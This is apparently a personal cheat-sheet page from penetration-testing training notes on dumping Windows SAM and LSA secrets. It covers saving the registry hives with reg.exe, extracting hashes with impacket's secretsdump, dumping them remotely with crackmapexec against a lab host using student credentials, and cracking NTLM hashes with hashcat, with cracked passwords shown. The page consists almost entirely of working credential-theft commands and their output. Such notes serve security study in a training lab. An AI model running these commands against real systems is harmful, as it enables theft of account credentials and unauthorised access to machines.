SAM/LSA

Local Dumping

Dumping Registry Hives using reg.exe

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

The operation completed successfully.

Dumping hashes using secretsdump.py from the reg.exe output

$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Remote Dumping

Dumping LSA (hklm\security)

$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

Dumping SAM (hklm\sam)

$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

Cracking hashes

Cracking hashes with hashcat

$ sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

<SNIP>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

f7eb9c06fafaa23c4bcf22ba6781c1e2:dragon          
6f8c3f4d3869a10f3b4f0522f537fd33:iloveme         
184ecdda8cf1dd238d438c4aea4d560d:adrian          
31d6cfe0d16ae931b73c59d7e0c089c0:

PreviousWindows Local Password Attacks NextLSASS

Last updated 2 years ago

hashtagLocal Dumping

hashtagDumping Registry Hives using reg.exe

hashtagRemote Dumping

hashtagDumping LSA (hklm\security)

hashtagDumping SAM (hklm\sam)

hashtagCracking hashes

hashtagCracking hashes with hashcat

Local Dumping

Dumping Registry Hives using reg.exe

Remote Dumping

Dumping LSA (hklm\security)

Dumping SAM (hklm\sam)

Cracking hashes

Cracking hashes with hashcat